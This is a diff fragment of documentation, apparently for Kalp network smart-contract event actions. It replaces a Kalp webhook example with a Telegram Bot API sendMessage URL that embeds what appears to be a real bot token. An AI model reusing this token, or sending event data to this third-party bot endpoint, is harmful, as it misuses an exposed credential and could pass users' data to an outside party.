Prerequisites

 - Deploy: Deploy a new smart contract

-https://dev-api.kalp.network/webhook) - API Payload (JSON): The JSON data to include in the request body.
+https://api.telegram.org/bot7754368882:AAHS4KbbOkl5rEHoBBIR8eljgwq2PARYLyY/sendMessage - API Payload (JSON): The JSON data to include in the request body.
+You can pass both fixed values and event parameters in a POST action.

 Example POST configuration

-- Target Parameters (one per line): The parameters to pass to the function.
-Enter each parameter on a separate line.
-You can use
+- Target Parameters: The parameters to pass to the function.
+You can use fixed values or reference event data dynamically with re.event(0), re.event(1), etc. Enter each parameter on a separate line.

 - Smart Contract: Upload a